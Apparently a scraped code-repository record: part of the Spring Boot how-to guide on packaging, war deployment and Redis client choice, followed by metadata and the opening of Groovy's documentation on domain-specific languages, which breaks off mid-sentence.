configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-extract-specific-libraries-when-an-executable-jar-runs]]\n=== Extract Specific Libraries When an Executable Jar Runs\nMost nested libraries in an executable jar do not need to be unpacked in order to run.\nHowever, certain libraries can have problems. For example, JRuby includes its own nested\njar support, which assumes that the `jruby-complete.jar` is always directly available as a\nfile in its own right.\n\nTo deal with any problematic libraries, you can flag that specific nested jars should be\nautomatically unpacked when the executable jar first runs. Such nested jars are written\nbeneath the temporary directory identified by the `java.io.tmpdir` system property.\n\nWARNING: Care should be taken to ensure that your operating system is configured so that\nit will not delete the jars that have been unpacked to the temporary directory while the\napplication is still running.\n\nFor example, to indicate that JRuby should be flagged for unpacking by using the Maven\nPlugin, you would add the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<requiresUnpack>\n\t\t\t\t\t\t<dependency>\n\t\t\t\t\t\t\t<groupId>org.jruby<\/groupId>\n\t\t\t\t\t\t\t<artifactId>jruby-complete<\/artifactId>\n\t\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<\/requiresUnpack>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-create-a-nonexecutable-jar]]\n=== Create a Non-executable JAR with Exclusions\nOften, if you have an executable and a non-executable jar as two separate build products,\nthe executable version has additional configuration files that are not needed in a library\njar. For example, the `application.yml` configuration file might by excluded from the\nnon-executable JAR.\n\nIn Maven, the executable jar must be the main artifact and you can add a classified jar\nfor the library, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-jar-plugin<\/artifactId>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<id>lib<\/id>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<classifier>lib<\/classifier>\n\t\t\t\t\t\t\t<excludes>\n\t\t\t\t\t\t\t\t<exclude>application.yml<\/exclude>\n\t\t\t\t\t\t\t<\/excludes>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-remote-debug-maven-run]]\n=== Remote Debug a Spring Boot Application Started with Maven\nTo attach a remote debugger to a Spring Boot application that was started with Maven, you\ncan use the `jvmArguments` property of the {spring-boot-maven-plugin-site}[maven plugin].\n\nSee {spring-boot-maven-plugin-site}\/examples\/run-debug.html[this example] for more\ndetails.\n\n\n\n[[howto-build-an-executable-archive-with-ant]]\n=== Build an Executable Archive from Ant without Using `spring-boot-antlib`\nTo build with Ant, you need to grab dependencies, compile, and then create a jar or war\narchive. To make it executable, you can either use the `spring-boot-antlib`\nmodule or you can follow these instructions:\n\n. If you are building a jar, package the application's classes and resources in a nested\n`BOOT-INF\/classes` directory. If you are building a war, package the application's\nclasses in a nested `WEB-INF\/classes` directory as usual.\n. Add the runtime dependencies in a nested `BOOT-INF\/lib` directory for a jar or\n`WEB-INF\/lib` for a war. Remember *not* to compress the entries in the archive.\n. Add the `provided` (embedded container) dependencies in a nested `BOOT-INF\/lib`\ndirectory for a jar or `WEB-INF\/lib-provided` for a war. Remember *not* to compress the\nentries in the archive.\n. Add the `spring-boot-loader` classes at the root of the archive (so that the `Main-Class`\nis available).\n. Use the appropriate launcher (such as `JarLauncher` for a jar file) as a `Main-Class`\nattribute in the manifest and specify the other properties it needs as manifest entries --\nprincipally, by setting a `Start-Class` property.\n\nThe following example shows how to build an executable archive with Ant:\n\n[source,xml,indent=0]\n----\n\t<target name=\"build\" depends=\"compile\">\n\t\t<jar destfile=\"target\/${ant.project.name}-${spring-boot.version}.jar\" compress=\"false\">\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"target\/classes\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"src\/main\/resources\" erroronmissingdir=\"false\"\/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"${lib.dir}\/runtime\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/lib\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<zipfileset src=\"${lib.dir}\/loader\/spring-boot-loader-jar-${spring-boot.version}.jar\" \/>\n\t\t\t<manifest>\n\t\t\t\t<attribute name=\"Main-Class\" value=\"org.springframework.boot.loader.JarLauncher\" \/>\n\t\t\t\t<attribute name=\"Start-Class\" value=\"${start-class}\" \/>\n\t\t\t<\/manifest>\n\t\t<\/jar>\n\t<\/target>\n----\n\nThe {github-code}\/spring-boot-samples\/spring-boot-sample-ant[Ant Sample] has a\n`build.xml` file with a `manual` task that should work if you run it with the following\ncommand:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ ant -lib <folder containing ivy-2.2.jar> clean manual\n----\n\nThen you can run the application with the following command:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar target\/*.jar\n----\n\n\n\n[[howto-traditional-deployment]]\n== Traditional Deployment\n\nSpring Boot supports traditional deployment as well as more modern forms of deployment.\nThis section answers common questions about traditional deployment.\n\n\n\n[[howto-create-a-deployable-war-file]]\n=== Create a Deployable War File\n\nWARNING: Because Spring WebFlux does not strictly depend on the Servlet API and\napplications are deployed by default on an embedded Reactor Netty server,\nWar deployment is not supported for WebFlux applications.\n\nThe first step in producing a deployable war file is to provide a\n`SpringBootServletInitializer` subclass and override its `configure` method. Doing so\nmakes use of Spring Framework's Servlet 3.0 support and lets you configure your\napplication when it is launched by the servlet container. Typically, you should update\nyour application's main class to extend `SpringBootServletInitializer`, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\treturn application.sources(Application.class);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nThe next step is to update your build configuration such that your project produces a war\nfile rather than a jar file. If you use Maven and `spring-boot-starter-parent` (which\nconfigures Maven's war plugin for you), all you need to do is to modify `pom.xml` to\nchange the packaging to war, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<packaging>war<\/packaging>\n----\n\nIf you use Gradle, you need to modify `build.gradle` to apply the war plugin to the\nproject, as follows:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tapply plugin: 'war'\n----\n\nThe final step in the process is to ensure that the embedded servlet container does not\ninterfere with the servlet container to which the war file is deployed. To do so, you\nneed to mark the embedded servlet container dependency as being provided.\n\nIf you use Maven, the following example marks the servlet container (Tomcat, in this\ncase) as being provided:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<!-- \u2026 -->\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<scope>provided<\/scope>\n\t\t<\/dependency>\n\t\t<!-- \u2026 -->\n\t<\/dependencies>\n----\n\nIf you use Gradle, the following example marks the servlet container (Tomcat, in this\ncase) as being provided:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\t\/\/ \u2026\n\t\tprovidedRuntime 'org.springframework.boot:spring-boot-starter-tomcat'\n\t\t\/\/ \u2026\n\t}\n----\n\nTIP: `providedRuntime` is preferred to Gradle's `compileOnly` configuration. Among other\nlimitations, `compileOnly` dependencies are not on the test classpath, so any web-based\nintegration tests fail.\n\nIf you use the <<build-tool-plugins.adoc#build-tool-plugins, Spring Boot build tools>>,\nmarking the embedded servlet container dependency as provided produces an executable war\nfile with the provided dependencies packaged in a `lib-provided` directory. This means\nthat, in addition to being deployable to a servlet container, you can also run your\napplication by using `java -jar` on the command line.\n\nTIP: Take a look at Spring Boot's sample applications for a\n{github-code}\/spring-boot-samples\/spring-boot-sample-traditional\/pom.xml[Maven-based\nexample] of the previously described configuration.\n\n\n\n\n[[howto-convert-an-existing-application-to-spring-boot]]\n=== Convert an Existing Application to Spring Boot\nFor a non-web application, it should be easy to convert an existing Spring application to\na Spring Boot application. To do so, throw away the code that creates your\n`ApplicationContext` and replace it with calls to `SpringApplication` or\n`SpringApplicationBuilder`. Spring MVC web applications are generally amenable to first\ncreating a deployable war application and then migrating it later to an executable war\nor jar. See the https:\/\/spring.io\/guides\/gs\/convert-jar-to-war\/[Getting\nStarted Guide on Converting a jar to a war].\n\nTo create a deployable war by extending `SpringBootServletInitializer` (for example, in a\nclass called `Application`) and adding the Spring Boot `@SpringBootApplication`\nannotation, use code similar to that shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\t\/\/ Customize the application or call application.sources(...) to add sources\n\t\t\t\/\/ Since our example is itself a @Configuration class (via @SpringBootApplication)\n\t\t\t\/\/ we actually don't need to override this method.\n\t\t\treturn application;\n\t\t}\n\n\t}\n----\n\nRemember that, whatever you put in the `sources` is merely a Spring `ApplicationContext`.\nNormally, anything that already works should work here. There might be some beans you can\nremove later and let Spring Boot provide its own defaults for them, but it should be\npossible to get something working before you need to do that.\n\nStatic resources can be moved to `\/public` (or `\/static` or `\/resources` or\n`\/META-INF\/resources`) in the classpath root. The same applies to `messages.properties`\n(which Spring Boot automatically detects in the root of the classpath).\n\nVanilla usage of Spring `DispatcherServlet` and Spring Security should require no further\nchanges. If you have other features in your application (for instance, using other\nservlets or filters), you may need to add some configuration to your `Application`\ncontext, by replacing those elements from the `web.xml`, as follows:\n\n* A `@Bean` of type `Servlet` or `ServletRegistrationBean` installs that bean in the\ncontainer as if it were a `<servlet\/>` and `<servlet-mapping\/>` in `web.xml`.\n* A `@Bean` of type `Filter` or `FilterRegistrationBean` behaves similarly (as a\n`<filter\/>` and `<filter-mapping\/>`).\n* An `ApplicationContext` in an XML file can be added through an `@ImportResource` in\nyour `Application`. Alternatively, simple cases where annotation configuration is\nheavily used already can be recreated in a few lines as `@Bean` definitions.\n\nOnce the war file is working, you can make it executable by adding a `main` method to\nyour `Application`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(Application.class, args);\n\t}\n----\n\n[NOTE]\n====\nIf you intend to start your application as a war or as an executable application, you\nneed to share the customizations of the builder in a method that is both available to the\n`SpringBootServletInitializer` callback and in the `main` method in a class similar to the\nfollowing:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {\n\t\t\treturn configureApplication(builder);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tconfigureApplication(new SpringApplicationBuilder()).run(args);\n\t\t}\n\n\t\tprivate static SpringApplicationBuilder configureApplication(SpringApplicationBuilder builder) {\n\t\t\treturn builder.sources(Application.class).bannerMode(Banner.Mode.OFF);\n\t\t}\n\n\t}\n----\n====\n\nApplications can fall into more than one category:\n\n* Servlet 3.0+ applications with no `web.xml`.\n* Applications with a `web.xml`.\n* Applications with a context hierarchy.\n* Applications without a context hierarchy.\n\nAll of these should be amenable to translation, but each might require slightly different\ntechniques.\n\nServlet 3.0+ applications might translate pretty easily if they already use the Spring\nServlet 3.0+ initializer support classes. Normally, all the code from an existing\n`WebApplicationInitializer` can be moved into a `SpringBootServletInitializer`. If your\nexisting application has more than one `ApplicationContext` (for example, if it uses\n`AbstractDispatcherServletInitializer`) then you might be able to combine all your context\nsources into a single `SpringApplication`. The main complication you might encounter is if\ncombining does not work and you need to maintain the context hierarchy. See the\n<<howto-build-an-application-context-hierarchy, entry on building a hierarchy>> for\nexamples. An existing parent context that contains web-specific features usually\nneeds to be broken up so that all the `ServletContextAware` components are in the child\ncontext.\n\nApplications that are not already Spring applications might be convertible to Spring\nBoot applications, and the previously mentioned guidance may help. However, you may yet\nencounter problems. In that case, we suggest\nhttps:\/\/stackoverflow.com\/questions\/tagged\/spring-boot[asking questions on Stack Overflow\nwith a tag of `spring-boot`].\n\n\n\n[[howto-weblogic]]\n=== Deploying a WAR to WebLogic\nTo deploy a Spring Boot application to WebLogic, you must ensure that your servlet\ninitializer *directly* implements `WebApplicationInitializer` (even if you extend from a\nbase class that already implements it).\n\nA typical initializer for WebLogic should resemble the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\timport org.springframework.boot.web.servlet.support.SpringBootServletInitializer;\n\timport org.springframework.web.WebApplicationInitializer;\n\n\t@SpringBootApplication\n\tpublic class MyApplication extends SpringBootServletInitializer implements WebApplicationInitializer {\n\n\t}\n----\n\nIf you use Logback, you also need to tell WebLogic to prefer the packaged version\nrather than the version that was pre-installed with the server. You can do so by adding a\n`WEB-INF\/weblogic.xml` file with the following contents:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<wls:weblogic-web-app\n\t\txmlns:wls=\"http:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee\n\t\t\thttp:\/\/java.sun.com\/xml\/ns\/javaee\/ejb-jar_3_0.xsd\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\/1.4\/weblogic-web-app.xsd\">\n\t\t<wls:container-descriptor>\n\t\t\t<wls:prefer-application-packages>\n\t\t\t\t<wls:package-name>org.slf4j<\/wls:package-name>\n\t\t\t<\/wls:prefer-application-packages>\n\t\t<\/wls:container-descriptor>\n\t<\/wls:weblogic-web-app>\n----\n\n\n\n[[howto-use-jedis-instead-of-lettuce]]\n=== Use Jedis Instead of Lettuce\nBy default, the Spring Boot starter (`spring-boot-starter-data-redis`) uses\nhttps:\/\/github.com\/lettuce-io\/lettuce-core\/[Lettuce]. You need to exclude that\ndependency and include the https:\/\/github.com\/xetorthio\/jedis\/[Jedis] one instead. Spring\nBoot manages these dependencies to help make this process as easy as possible.\n\nThe following example shows how to do so in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-redis<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>io.lettuce<\/groupId>\n\t\t\t\t<artifactId>lettuce-core<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>redis.clients<\/groupId>\n\t\t<artifactId>jedis<\/artifactId>\n\t<\/dependency>\n----\n\nThe following example shows how to do so in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\tcompile.exclude module: \"lettuce\"\n\t}\n\n\tdependencies {\n\t\tcompile(\"redis.clients:jedis\")\n\t\t\/\/ ...\n\t}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b278d4796d6b55e4f853f5b112c1bcc68d9f7db5","subject":"Checkout MarkupBuilder","message":"Checkout MarkupBuilder\n\nFirst attempt to provide more documentation for this series of tools","repos":"apache\/groovy,pledbrook\/incubator-groovy,shils\/groovy,adjohnson916\/groovy-core,christoph-frick\/groovy-core,russel\/incubator-groovy,mariogarcia\/groovy-core,jwagenleitner\/incubator-groovy,armsargis\/groovy,nkhuyu\/incubator-groovy,jwagenleitner\/groovy,i55ac\/incubator-groovy,genqiang\/incubator-groovy,alien11689\/groovy-core,kenzanmedia\/incubator-groovy,eginez\/incubator-groovy,paulk-asert\/incubator-groovy,ChanJLee\/incubator-groovy,apache\/groovy,paplorinc\/incubator-groovy,alien11689\/incubator-groovy,avafanasiev\/groovy,antoaravinth\/incubator-groovy,pledbrook\/incubator-groovy,ebourg\/groovy-core,mariogarcia\/groovy-core,yukangguo\/incubator-groovy,gillius\/incubator-groovy,dpolivaev\/groovy,russel\/incubator-groovy,guangying945\/incubator-groovy,kenzanmedia\/incubator-groovy,adjohnson916\/incubator-groovy,EPadronU\/incubator-groovy,EPadronU\/incubator-groovy,rabbitcount\/incubator-groovy,kidaa\/incubator-groovy,antoaravinth\/incubator-groovy,samanalysis\/incubator-groovy,mariogarcia\/groovy-core,PascalSchumacher\/incubator-groovy,paplorinc\/incubator-groovy,ebourg\/incubator-groovy,upadhyayap\/incubator-groovy,i55ac\/incubator-groovy,alien11689\/groovy-core,armsargis\/groovy,gillius\/incubator-groovy,sagarsane\/groovy-core,jwagenleitner\/groovy,taoguan\/incubator-groovy,yukangguo\/incubator-groovy,guangying945\/incubator-groovy,adjohnson916\/groovy-core,jwagenleitner\/incubator-groovy,sagarsane\/groovy-core,avafanasiev\/groovy,groovy\/groovy-core,shils\/incubator-groovy,sagarsane\/groovy-core,apache\/incubator-groovy,alien11689\/groovy-core,nkhuyu\/incubator-groovy,nkhuyu\/incubator-groovy,mariogarcia\/groovy-core,guangying945\/incubator-groovy,bsideup\/incubator-groovy,pledbrook\/incubator-groovy,graemerocher\/incubator-groovy,armsargis\/groovy,PascalSchumacher\/incubator-groovy,ebourg\/incubator-groovy,bsideup\/groovy-core,rlovtangen\/groovy-core,tkruse\/incubator-groovy,bsideup\/incubator-groovy,dpolivaev\/groovy,russel\/groovy,bsideup\/incubator-groovy,paulk-asert\/incubator-groovy,alien11689\/groovy-core,jwagenleitner\/incubator-groovy,aaronzirbes\/incubator-groovy,bsideup\/incubator-groovy,apache\/incubator-groovy,alien11689\/groovy-core,fpavageau\/groovy,eginez\/incubator-groovy,russel\/incubator-groovy,aaronzirbes\/incubator-groovy,ebourg\/groovy-core,genqiang\/incubator-groovy,nobeans\/incubator-groovy,shils\/incubator-groovy,groovy\/groovy-core,paplorinc\/incubator-groovy,EPadronU\/incubator-groovy,PascalSchumacher\/incubator-groovy,christoph-frick\/groovy-core,kidaa\/incubator-groovy,kidaa\/incubator-groovy,genqiang\/incubator-groovy,upadhyayap\/incubator-groovy,adjohnson916\/groovy-core,pickypg\/incubator-groovy,aaronzirbes\/incubator-groovy,jwagenleitner\/incubator-groovy,ebourg\/incubator-groovy,i55ac\/incubator-groovy,taoguan\/incubator-groovy,upadhyayap\/incubator-groovy,rabbitcount\/incubator-groovy,russel\/groovy,adjohnson916\/groovy-core,nkhuyu\/incubator-groovy,paulk-asert\/incubator-groovy,upadhyayap\/incubator-groovy,genqiang\/incubator-groovy,jwagenleitner\/groovy,alien11689\/incubator-groovy,sagarsane\/incubator-groovy,paulk-asert\/incubator-groovy,sagarsane\/incubator-groovy,pledbrook\/incubator-groovy,bsideup\/groovy-core,ChanJLee\/incubator-groovy,i55ac\/incubator-groovy,kenzanmedia\/incubator-groovy,tkruse\/incubator-groovy,sagarsane\/incubator-groovy,graemerocher\/incubator-groovy,tkruse\/incubator-groovy,ChanJLee\/incubator-groovy,aim-for-better\/incubator-groovy,apache\/groovy,bsideup\/groovy-core,adjohnson916\/incubator-groovy,apache\/incubator-groovy,pickypg\/incubator-groovy,kenzanmedia\/incubator-groovy,antoaravinth\/incubator-groovy,paulk-asert\/groovy,adjohnson916\/groovy-core,alien11689\/incubator-groovy,sagarsane\/groovy-core,paulk-asert\/incubator-groovy,tkruse\/incubator-groovy,PascalSchumacher\/incubator-groovy,paplorinc\/incubator-groovy,ebourg\/incubator-groovy,ebourg\/groovy-core,traneHead\/groovy-core,ebourg\/groovy-core,guangying945\/incubator-groovy,gillius\/incubator-groovy,bsideup\/groovy-core,yukangguo\/incubator-groovy,yukangguo\/incubator-groovy,samanalysis\/incubator-groovy,christoph-frick\/groovy-core,adjohnson916\/incubator-groovy,rlovtangen\/groovy-core,christoph-frick\/groovy-core,eginez\/incubator-groovy,ebourg\/groovy-core,rabbitcount\/incubator-groovy,jwagenleitner\/groovy,sagarsane\/incubator-groovy,graemerocher\/incubator-groovy,russel\/groovy,paulk-asert\/groovy,pickypg\/incubator-groovy,graemerocher\/incubator-groovy,sagarsane\/groovy-core,gillius\/incubator-groovy,paulk-asert\/groovy,samanalysis\/incubator-groovy,groovy\/groovy-core,avafanasiev\/groovy,antoaravinth\/incubator-groovy,shils\/incubator-groovy,nobeans\/incubator-groovy,rlovtangen\/groovy-core,alien11689\/incubator-groovy,shils\/groovy,shils\/groovy,russel\/groovy,traneHead\/groovy-core,fpavageau\/groovy,traneHead\/groovy-core,adjohnson916\/incubator-groovy,aim-for-better\/incubator-groovy,mariogarcia\/groovy-core,shils\/groovy,apache\/incubator-groovy,pickypg\/incubator-groovy,rlovtangen\/groovy-core,groovy\/groovy-core,dpolivaev\/groovy,taoguan\/incubator-groovy,apache\/groovy,aim-for-better\/incubator-groovy,paulk-asert\/groovy,christoph-frick\/groovy-core,eginez\/incubator-groovy,nobeans\/incubator-groovy,avafanasiev\/groovy,PascalSchumacher\/incubator-groovy,aaronzirbes\/incubator-groovy,samanalysis\/incubator-groovy,rlovtangen\/groovy-core,dpolivaev\/groovy,russel\/incubator-groovy,kidaa\/incubator-groovy,shils\/incubator-groovy,taoguan\/incubator-groovy,aim-for-better\/incubator-groovy,armsargis\/groovy,rabbitcount\/incubator-groovy,traneHead\/groovy-core,fpavageau\/groovy,nobeans\/incubator-groovy,fpavageau\/groovy,groovy\/groovy-core,EPadronU\/incubator-groovy,ChanJLee\/incubator-groovy","old_file":"src\/spec\/doc\/core-domain-specific-languages.adoc","new_file":"src\/spec\/doc\/core-domain-specific-languages.adoc","new_contents":"= Domain-Specific Languages\n\n== Command chains\n\nGroovy lets you omit parentheses around the arguments of a\nmethod call for top-level statements. ``command chain'' feature extends this by allowing us to chain such\nparentheses-free method calls, requiring neither parentheses around arguments, nor dots between the chained calls.\nThe general idea is that a call like `a b c d` will actually be equivalent to `a(b).c(d)`. This\nalso works with multiple arguments, closure arguments, and even named arguments. Furthermore, such command chains can\nalso appear on the right-hand side of assignments. Let\u2019s have a look at some examples\nsupported by this new syntax:\n\n[source,groovy]\n---------------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_1,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_2,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_3,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_4,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_5,indent=0]\n---------------------------------------------------------------------------------------------------------------\n\nIt is also possible to use methods in the chain which take no arguments,\nbut in that case, the parentheses are needed:\n\n[source,groovy]\n-------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_6,indent=0]\n-------------------------------------------------------------------------------------------------\n\nIf your command chain contains an odd number of elements, the chain will\nbe composed of method \/ arguments, and will finish by a final property\naccess:\n\n[source,groovy]\n-------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_7,indent=0]\n-------------------------------------------------------------------------------------\n\nThis command chain approach opens up interesting possibilities in terms of the much wider range of DSLs which\ncan now be written in Groovy.\n\nThe above examples illustrate using a command chain based DSL but not how to create one. There are various strategies\nthat you can use, but to illustrate creating such a DSL, we will show a couple of examples - first using maps and Closures:\n\n[source,groovy]\n------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl1,indent=0]\n------------------------------------------------------------------------------------------------------\n\nAs a second example, consider how you might write a DSL for simplifying\none of your existing APIs. Maybe you need to put this code in front of\ncustomers, business analysts or testers who might be not hard-core Java\ndevelopers. We\u2019ll use the `Splitter` from the Google\nhttp:\/\/code.google.com\/p\/guava-libraries\/[Guava libraries] project as it\nalready has a nice Fluent API. Here is how we might use it out of the\nbox:\n\n[source,groovy]\n----------------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl2,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl2_assert,indent=0]\n----------------------------------------------------------------------------------------------------------------\n\nIt reads fairly well for a Java developer but if that is not your target\naudience or you have many such statements to write, it could be\nconsidered a little verbose. Again, there are many options for writing a\nDSL. We\u2019ll keep it simple with Maps and Closures. We\u2019ll first write a\nhelper method:\n\n[source,groovy]\n------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl3,indent=0]\n------------------------------------------------------------------------------------------------------\n\nnow instead of this line from our original example:\n\n[source,groovy]\n----------------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl2_assert,indent=0]\n----------------------------------------------------------------------------------------------------------------\n\nwe can write this:\n\n[source,groovy]\n-----------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl3_assert,indent=0]\n-----------------------------------------------------\n\n\n== Operator overloading (TBD)\n== Script base classes (TBD)\n== Adding properties to numbers (TBD)\n[[section-delegatesto]]\n== @DelegatesTo\n\n[[TheDelegatesToannotation-DSLsmadeeasy]]\n=== Explaining delegation strategy at compile time\n\n`@groovy.lang.DelegatesTo` is a documentation and compile-time annotation aimed at:\n\n * documenting APIs that use closures as arguments\n * providing type information for the static type checker and compiler\n\nThe Groovy language is a platform of choice for building DSLs. Using\nclosures, it\u2019s quite easy to create custom control structures, as well\nas it is simple to create builders. Imagine that you have the following\ncode:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=email_builder_usage,indent=0]\n---------------------------------------\n\nOne way of implementing this is using the builder strategy, which\nimplies a method, named `email`\u00a0which accepts a closure as an argument.\nThe method may delegate subsequent calls to an object that implements\nthe\u00a0`from`,\u00a0`to`,\u00a0`subject` and\u00a0`body` methods. Again,\u00a0`body` is a\nmethod which accepts a closure as an argument and that uses the builder\nstrategy.\n\nImplementing such a builder is usually done the following way:\n\n[source,groovy]\n----------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=email_method_no_delegatesto,indent=0]\n----------------------------------------------\n\nthe `EmailSpec` class implements the\u00a0`from`,\u00a0`to`, \u2026 methods. By\ncalling\u00a0`rehydrate`, we\u2019re creating a copy of the closure for which we\nset the\u00a0`delegate`,\u00a0`owner` and\u00a0`thisObject` values. Setting the owner\nand the `this` object is not very important here since we will use the\n`DELEGATE_ONLY` strategy which says that the method calls will be\nresolved only against the delegate of the closure.\n\n[source,groovy]\n----------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=emailspec_no_delegatesto,indent=0]\n----------------------------------------------\n\nThe `EmailSpec` class has itself a `body` method accepting a closure that is cloned and executed. This is what\nwe call the builder pattern in Groovy.\n\nOne of the problems with the code that we\u2019ve shown is that the user of\nthe `email` method doesn\u2019t have any information about the methods that\nhe\u2019s allowed to call inside the closure. The only possible information\nis from the method documentation. There are two issues with this: first\nof all, documentation is not always written, and if it is, it\u2019s not\nalways available (javadoc not downloaded, for example). Second, it\ndoesn\u2019t help IDEs. What would be really interesting, here, is for IDEs\nto help the developer by suggesting, once they are in the closure body,\nmethods that exist on the `email` class.\n\nMoreover, if the user calls a method in the closure which is not defined\nby the\u00a0`EmailSpec` class, the IDE should at least issue a warning 